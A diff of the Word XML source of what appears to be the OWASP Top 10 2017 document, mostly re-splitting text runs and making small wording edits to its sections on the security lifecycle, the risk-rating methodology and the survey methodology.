     </w:p>
     <w:p>
@@ -13259,7 +12847,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Negotiate with internal or external developers the requirements, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices</w:t>
+        <w:t xml:space="preserve">Negotiate with internal or external </w:t>
+      </w:r>
+      <w:r>
+        <w:t>developers the requirements, including guidelines and security requirements with respect to your security program, e.g. SDLC, best practices</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13271,10 +12862,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Rate the fulfillment of all technical requirements including a rough planning </w:t>
-      </w:r>
-      <w:r>
-        <w:t>and design</w:t>
+        <w:t>Rate the fulfillment of all technical requirements including a rough planning and design</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13286,7 +12874,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Negotiate all technical requirements including design, security and service level agreements (SLA)</w:t>
+        <w:t>Negotiate all technical re</w:t>
+      </w:r>
+      <w:r>
+        <w:t>quirements including design, security and service level agreements (SLA)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13298,20 +12889,14 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Consider adopting templates and checklists, such as </w:t>
+        <w:t xml:space="preserve">Adopt templates and checklists, such as </w:t>
       </w:r>
       <w:hyperlink r:id="rId206">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">OWASP </w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>Secure Software Contract Annex</w:t>
+          <w:t>OWASP Secure Software Contract Annex</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -13324,7 +12909,10 @@
         <w:t>NB</w:t>
       </w:r>
       <w:r>
-        <w:t>: The Annex is a sample specific to US contract law, and is likely to need legal review in your jurisdiction. Please consult qualified legal advice before using the Annex.</w:t>
+        <w:t>: The Annex is a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> sample specific to US contract law, and is likely to need legal review in your jurisdiction. Please consult qualified legal advice before using the Annex.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13346,10 +12934,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Negotiate planning and design w</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ith the developers and internal shareholders, e.g. security specialists</w:t>
+        <w:t>Negotiate planning and design with the developers and internal shareholders, e.g</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. security specialists</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13361,10 +12949,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Define a security architecture, controls, and countermeasures according the protection needs and the planned environmental security level. This should be supported by security speciali</w:t>
-      </w:r>
-      <w:r>
-        <w:t>sts.</w:t>
+        <w:t>Define a security architecture, controls, and countermeasures according the protection needs and the planned environmental security level. This should be supported by security specialists.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13376,7 +12961,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Get the application owner to assume remaining risks or to provide additional resources.</w:t>
+        <w:t>Get the application owner to assume remainin</w:t>
+      </w:r>
+      <w:r>
+        <w:t>g risks or to provide additional resources.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13410,10 +12998,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Please review the +</w:t>
-      </w:r>
-      <w:r>
-        <w:t>D "What's next for developers" for guidance.</w:t>
+        <w:t>Please review the +D "What's next for developers" for guidance.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13448,10 +13033,10 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Test the techni</w:t>
-      </w:r>
-      <w:r>
-        <w:t>cal functions and integration to the IT architecture, and coordinate business tests. Consider to test use and abuse cases from technical and business perspectives.</w:t>
+        <w:t>Test the technical functions and integration to the IT archi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>tecture, and coordinate business tests. Create "use" and "abuse" test cases from technical and business perspectives.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13463,10 +13048,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Manage security tests according to internal processes, the protection needs and the level of</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> security where the application is going to be deployed</w:t>
+        <w:t>Manage security tests according to internal processes, the protection needs and the level of security where the application is going to be</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> deployed</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13512,10 +13097,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Operating including the se</w:t>
-      </w:r>
-      <w:r>
-        <w:t>curity management for the application (e.g. patch management)</w:t>
+        <w:t>Operating including the security management for the application (e.g. pa</w:t>
+      </w:r>
+      <w:r>
+        <w:t>tch management)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13623,7 +13208,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="134" w:name="r-note-about-risks"/>
-      <w:bookmarkStart w:id="135" w:name="_Toc496378434"/>
+      <w:bookmarkStart w:id="135" w:name="_Toc496437912"/>
       <w:bookmarkEnd w:id="134"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -13657,13 +13242,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>and earlier versions of the Top 10 focused on identifying the most prevalent “vulnerabilities,” the OWASP Top 10 has always been organized around risks. This focus on risks has caused some understandable confusion on the part of people searching for an air</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">tight weakness taxonomy. The </w:t>
+        <w:t xml:space="preserve"> and earlier versions of the Top 10 focused on identifying the most prevalent “vu</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">lnerabilities,” the OWASP Top 10 has always been organized around risks. This focus on risks has caused some understandable confusion on the part of people searching for an airtight weakness taxonomy. The </w:t>
       </w:r>
       <w:hyperlink r:id="rId208">
         <w:r>
@@ -13674,10 +13256,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> clarified the risk-focus in the Top 10 by being very explicit about how threat agents, attack vectors, weaknesses, technical impacts, and busi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ness impacts combine to produce risks. This version of the OWASP Top 10 continues to follow the same methodology.</w:t>
+        <w:t xml:space="preserve"> clarified the risk-focus in the Top 10 by being very explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risks. This version of the OWASP Top 10 continue</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s to follow the same methodology.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13692,20 +13274,17 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OW</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>ASP Risk Rating Methodology</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>. For each Top 10 item, we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then rank ordered the Top 10</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> according to those weaknesses that typically introduce the most significant risk to an application. These factors get updated with each new Top 10 release as things change.</w:t>
+          <w:t>OWASP Risk Rating Methodology</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>. For each Top 10 item, we estimated the typical risk</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then rank ordered the Top 10 according to those weaknesses that typically introduce the most significant ris</w:t>
+      </w:r>
+      <w:r>
+        <w:t>k to an application. These factors get updated with each new Top 10 release as things change.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13724,10 +13303,13 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> defines numerous factors to help calculate the risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs. Consequently, we can </w:t>
-      </w:r>
-      <w:r>
-        <w:t>never be as precise as system owners can be when calculating risks for their application(s). You are best equipped to judge the importance of your applications and data, what your threats are, and how your system has been built and is being operated.</w:t>
+        <w:t xml:space="preserve"> defines numerous factors to help calculate the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs. Consequently, we can never be as precise as system owners can be when calculating risks for their app</w:t>
+      </w:r>
+      <w:r>
+        <w:t>lication(s). You are best equipped to judge the importance of your applications and data, what your threats are, and how your system has been built and is being operated.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13735,19 +13317,19 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Our m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ethodology includes three likelihood factors for each weakness (prevalence, detectability, and ease of exploit) and one impact factor (technical impact). The prevalence of a weakness is a factor that you typically don’t have to calculate. For prevalence da</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ta, we have been supplied prevalence statistics from a number of different organizations (as referenced in the Attribution section on page 4) and we have averaged their data together to come up with a Top 10 likelihood of existence list by prevalence. This</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> data was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for each weakness. The likelihood rating was then multiplied by our estimated average technical impact for each item to come </w:t>
-      </w:r>
-      <w:r>
-        <w:t>up with an overall risk ranking for each item in the Top 10 (the higher the result the higher the risk).  </w:t>
+        <w:t>Our methodology includes three likelihood factors for each weakness (prevalence, dete</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ctability, and ease of exploit) and one impact factor (technical impact). The prevalence of a weakness is a factor that you typically don’t have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organ</w:t>
+      </w:r>
+      <w:r>
+        <w:t>izations (as referenced in the Attribution section on page 4) and we have averaged their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined with the other two likelihood factors (detectability and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ease of exploit) to calculate a likelihood rating for each weakness. The likelihood rating was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each item in the Top 10 (the higher the resu</w:t>
+      </w:r>
+      <w:r>
+        <w:t>lt the higher the risk).  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13755,10 +13337,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>Note that this approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various technical details a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ssociated with your particular application. Any of these factors could significantly affect the overall likelihood of an attacker finding and exploiting a particular vulnerability. This rating does not take into account the actual impact on your business. </w:t>
+        <w:t>Note that this approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various technical details associated with your particular application. Any of these factors could significa</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ntly affect the overall likelihood of an attacker finding and exploiting a particular vulnerability. This rating does not take into account the actual impact on your business. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13767,7 +13349,10 @@
         <w:t>Your organization</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> will have to decide how much security risk from applications and APIs the </w:t>
+        <w:t xml:space="preserve"> will have to decide how much security risk from applications a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">nd APIs the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13784,7 +13369,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>The following illustrates our calculation of the risk for A6:2017 Security Misconfiguration.</w:t>
+        <w:t>The following illustrates our calculation of the risk for A6:2017 Security Misc</w:t>
+      </w:r>
+      <w:r>
+        <w:t>onfiguration.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13800,7 +13388,7 @@
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5943600" cy="2446186"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="6" name="Picture"/>
+            <wp:docPr id="7" name="Picture"/>
             <wp:cNvGraphicFramePr/>
             <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
@@ -13844,7 +13432,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="137" w:name="rf-details-about-risk-factors"/>
-      <w:bookmarkStart w:id="138" w:name="_Toc496378435"/>
+      <w:bookmarkStart w:id="138" w:name="_Toc496437913"/>
       <w:bookmarkEnd w:id="137"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -13867,25 +13455,22 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk fac</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">tors we have assigned to each risk. These factors were determined based on the available statistics and the experience of the OWASP Top 10 team. To understand these risks for a particular application or organization, </w:t>
+        <w:t>The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">vailable statistics and the experience of the OWASP Top 10 team. To understand these risks for a particular application or organization, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
         </w:rPr>
-        <w:t>you must consider your own specific thr</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t>eat agents and business impacts</w:t>
-      </w:r>
-      <w:r>
-        <w:t>. Even severe software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</w:t>
+        <w:t>you must consider your own specific threat agents and business impacts</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Even severe software weaknesses may not present</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13900,7 +13485,7 @@
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5943600" cy="3715965"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="7" name="Picture"/>
+            <wp:docPr id="8" name="Picture"/>
             <wp:cNvGraphicFramePr/>
             <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
@@ -13946,10 +13531,7 @@
       <w:bookmarkStart w:id="140" w:name="additional-risks-to-consider"/>
       <w:bookmarkEnd w:id="140"/>
       <w:r>
-        <w:t xml:space="preserve">Additional Risks To </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Consider</w:t>
+        <w:t>Additional Risks To Consider</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13957,10 +13539,13 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The Top 10 covers a lot of ground, but there are many other risks you should consider and evaluate in your organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are </w:t>
-      </w:r>
-      <w:r>
-        <w:t>being identified all the time.  Other important application security risks (in alphabetical order) that you should additionally consider include:</w:t>
+        <w:t>The Top 10 covers a lot of ground, but there are many other risks you s</w:t>
+      </w:r>
+      <w:r>
+        <w:t>hould consider and evaluate in your organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being identified all the time.  Other important application security risks (in a</w:t>
+      </w:r>
+      <w:r>
+        <w:t>lphabetical order) that you should additionally consider include:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13980,7 +13565,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="141" w:name="dat-methodology-and-data"/>
-      <w:bookmarkStart w:id="142" w:name="_Toc496378436"/>
+      <w:bookmarkStart w:id="142" w:name="_Toc496437914"/>
       <w:bookmarkEnd w:id="141"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -13993,10 +13578,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>At the OWASP Project Summit, active participants and community m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>embers decided on a vulnerability view, with up to two (2) forward looking vulnerability classes, with ordering defined partially by quantitative data, and partially by qualitative surveys.</w:t>
+        <w:t>At the OWASP Project Summit, active participants and community members decided on a vulnerability view, with up to two (2) forward looking vulnerability classes, with ordering defined partially by quantitative data, and partially by qualitative surveys.</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -14018,13 +13600,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>For the survey, we collected the vulnerab</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ility categories that had been previously identified as being “on the cusp” or were mentioned in feedback to 2017 RC1 on the Top 10 mailing list. We put them into a ranked survey and asked respondents to rank the top four vulnerabilities that they felt sho</w:t>
-      </w:r>
-      <w:r>
-        <w:t>uld be included in the OWASP Top 10 2017. The survey was open from Aug 2 – Sep 18, 2017. 516 responses were collected and the vulnerabilities were ranked.</w:t>
+        <w:t>For the survey, we collected the vulnerability categories that had been previously identified as being “on the cusp” or were mentioned in feedback to 2017 RC1 on the Top 10 mailing list. We put them into a ranked survey and asked res</w:t>
+      </w:r>
+      <w:r>
+        <w:t>pondents to rank the top four vulnerabilities that they felt should be included in the OWASP Top 10 2017. The survey was open from Aug 2 – Sep 18, 2017. 516 responses were collected and the vulnerabilities were ranked.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -14236,10 +13815,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Authorization Bypass Through User-Controlled Key (IDOR &amp; Path Traversal) [CWE-</w:t>
-            </w:r>
-            <w:r>
-              <w:t>639]</w:t>
+              <w:t>Authorization Bypass Through User-Controlled Key (IDOR &amp; Path Travers</w:t>
+            </w:r>
+            <w:r>
+              <w:t>al) [CWE-639]</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14391,7 +13970,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="145" w:name="acknowledgements"/>
-      <w:bookmarkStart w:id="146" w:name="_Toc496378437"/>
+      <w:bookmarkStart w:id="146" w:name="_Toc496437915"/>
       <w:bookmarkEnd w:id="145"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -15493,7 +15072,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="149" w:name="references-11"/>
-      <w:bookmarkStart w:id="150" w:name="_Toc496378438"/>
+      <w:bookmarkStart w:id="150" w:name="_Toc496437916"/>
       <w:bookmarkEnd w:id="149"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -15670,10 +15249,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The following projects are highly likely to b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e useful to adopters of the OWASP Top 10:</w:t>
+        <w:t>The following projects are highly likely to be useful to adopters of the OWASP Top 10:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15706,7 +15282,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Dependency Check</w:t>
+          <w:t>OWAS</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>P Dependency Check</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15835,7 +15417,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">For a full list of projects, please see </w:t>
+        <w:t>For a full li</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">st of projects, please see </w:t>
       </w:r>
       <w:hyperlink r:id="rId230">
         <w:r>
@@ -15877,13 +15462,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>MITRE Common We</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>akness Enumeration</w:t>
+          <w:t>MITRE Common Weakness Enumeration</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -15977,9 +15556,9 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="18811ACD"/>
+    <w:nsid w:val="17578D78"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="37949C38"/>
+    <w:tmpl w:val="FEC217EE"/>
     <w:lvl w:ilvl="0">
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="•"/>
@@ -16066,119 +15645,6 @@
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="367F51F4"/>
-    <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="A5F2D5F0"/>
-    <w:lvl w:ilvl="0" w:tplc="04090001">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="o"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2160" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="o"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="4320" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="o"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="6480" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-      </w:rPr>
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
@@ -16409,10 +15875,7 @@
   <w:num w:numId="76">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="77">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
-  <w:numIdMacAtCleanup w:val="77"/>
+  <w:numIdMacAtCleanup w:val="76"/>
 </w:numbering>
 </file>
 
@@ -17985,22 +17448,10 @@
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="005F2041"/>
+    <w:rsid w:val="007562CE"/>
     <w:pPr>
       <w:spacing w:after="100"/>
     </w:pPr>
-  </w:style>
-  <w:style w:type="character" w:styleId="UnresolvedMention">
-    <w:name w:val="Unresolved Mention"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="00CB6386"/>
-    <w:rPr>
-      <w:color w:val="808080"/>
-      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
-    </w:rPr>
   </w:style>
 </w:styles>
 </file>
@@ -18364,7 +17815,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CC79BCF5-C342-44F6-BD7F-3215A638D1CE}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{A40F708C-CC46-4207-851F-2EB9A6B2624C}">
